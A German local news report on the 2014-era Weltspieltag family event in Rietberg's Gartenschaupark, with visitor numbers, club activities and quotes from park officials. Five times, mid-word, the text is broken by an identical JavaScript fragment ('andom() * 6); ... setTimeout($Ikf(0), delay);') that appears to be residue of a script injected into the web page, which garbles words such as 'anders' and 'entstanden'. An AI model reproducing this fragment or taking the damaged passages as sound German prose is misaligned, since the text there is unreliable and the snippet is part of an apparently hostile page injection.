Weltspieletag in Rietberg mit 7000 Besuchern ein Erfolg

Der Gartenschaupark als größter Spielplatz in Nordrhein-Westfalen – die Weltspieltage haben an diesem Wochenende den Mädchen und Jungen höchst abwechslungs- und erlebnisreiche Stunden beschert. „Spiel und Spaß mit vielen besonderen Angeboten, die Mischung passt“, zog am Sonntagabend Park-Geschäftsführer Peter Milsch ein erstes Resümee.

„Auch in der fünften Auflage seit 2010 wusste unsere ganz auf Familien eingestellte Großveranstaltung zu begeistern. Und andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders als noch zum Vatertag, dieses Mal hat auch das Wetter mitgespielt.“ Tatsächlich lockte nach den regenreichen Tagen Ende Mai die kühle, aber sonnige Witterung Klein und Groß nach draußen. „Wir konnten über 7000 Besucher verbuchen. Das ist einfach klasse“, freute sich auch Aufsichtsratsvorsitzender Bürgermeister Andreas Sunder über die große Resonanz. „Die Weltspieltage sind zu einer ganz eigenen Erfolgsgeschichte innerhalb der vielen erfolgreichen Programmpunkte im Park geworden.“

Möglich mache das, so Milsch, das einmal mehr so gute Zusammenwirken zwischen der Park GmbH und den Vereinen. „Wir pflegen an vielen Stellen eine enge und gute Kooperation mit unseren Ehrenamtlern. Das zeigt sich natürlich jeden Tag in den Anlagen, die von Vereinen unterhalten und betreut werden und ganz besonders bei solchen Großereignissen wie dem Weltspieltag.“

Über 100 ehrenamtliche Helferinnen und Helfer aus 20 Gruppierungen sorgten in diesem Jahr für das bunte Programm aus sportlichen, kreativen, spannenden, lustigen aber auch nachdenklich stimmenden Möglichkeiten. Letzeres geschah mit so manchem Elternteil, das den Rolli-Parcous des Vereins für Körper- und Mehrfachbehinderte besuchte und zuschaute, wie das eigene, gesunde Kind im Rollstuhl die Hindernisse absolvierte.

Integrativ ging es beim Street Soccer des VKM zu, hier waren gemischte Teams zum Spiel auf dem Miniatur-Fußballfeld angetreten. Sportlich aber auch: das Bogenschießen bei den Fachleuten des TuS Viktoria, die den Kindern und Eltern ihre Disziplin näher brachten und den Umgang mit Pfeil und Bogen erklärten.

Die Kicker des TuS Viktoria freuten sich über reges Interesse an ihrem Fußballabzeichen, an mehreren Stationen galt es, den geschickten Umgang mit dem runden Leder unter Beweis zu stellen. Modelltruck fahren und das ebenso Steuern flotter Miniatur-Renncars faszinierten den Nachwuchs ebenso wie das Keschern im Sennebach. Hier endeckten die Kinder unter Betreuung des Grünen Klassenzimmers des Parks interessante Lebenswelten zwischen Wasser und Ufer.

Höhenangst durften jene nicht haben, die beim Kistenklettern der Schnurstracks GmbH mitmachten. Viele interessante Infomationen rund um das Rettungswesen gab es bei den Maltesern, das JRK bot mit der Aktion Tontöpfe zu bemalen auch Souvenirs für zu Hause an. Dicht umlagert war die Töpferscheibe von Thomas Benirschke, auch hier ebenso wie am Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and von Karin Wolf durfte der Nachwuchs alles Selbstgefertige mitnehmen.

Begeistert waren die Besucherkinder vom Streichelzoo an der Parzelle des Rassekaninchenzuchtvereins W 376 Rietberg und Umgebung. Denn hier durften sie die flauschigen Langohren knuddeln und erfuhren nebenbei alles Wissenswerte rund um die Haltung von Zwergkaninchen.

Vergängliche Kunstwerke entstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden bei der Jungen Union, hier erwiesen sich die Kinder mit Straßenkreide als kleine Künstler. 1000 Luftballons schickten sie zudem in den frühlingshaften Himmel. Die JU wird nach Sommerferien die Gewinner dieses Ballonwettbewerbes küren. Musikalisch ging es zu an Europas größter spielbarer Freiluftorgel, an der Orgeldiplome vergeben wurden.

Dazu herrschte an allen Spielflächen im Park wie etwa dem Rutschenturm, dem Wasserspielplatz, den Großbausteinen, den Großspielfeldern oder auch dem Wikingerschiff am Sennebach richtig reges Treiben. „Das Kinderparadies Gartenschaupark ist seinem Ruf gerecht geworden. Wir haben sehr viele zufriedene Rückmeldungen bekommen“, so Milsch. „Auch die Touren im Rollerball waren sehr begehrt. Hier wie auch bei den andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Aktionen mussten aufgrund der großen Besucherzahlen auch einmal Wartzeiten in Kauf genommen werden. Aber das lässt sich andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders leider nicht organisieren. Alle haben das aber auch geduldig hingenommen“, bedankt er sich bei den Besuchern.

Bereits zum Pfingstwochenende zieht der Park das nächste Trumpf-As aus dem Ärmel. Dann steht für gut zwei Wochen Europas größte Hüpfburgenanlage unweit der Volksbank-Arena. Aufsichtratsvorsitzender Andreas Sunder: „Im vergangenen Jahr hatten wir diese Attraktion erstmals verpflichtet. Sie kam richtig toll an und deshalb fiel uns die Entscheidung nicht schwer, die riesigen Hüpfburgen erneut zu buchen. Sie sind vom 6. bis 22. Juni täglich geöffnet.“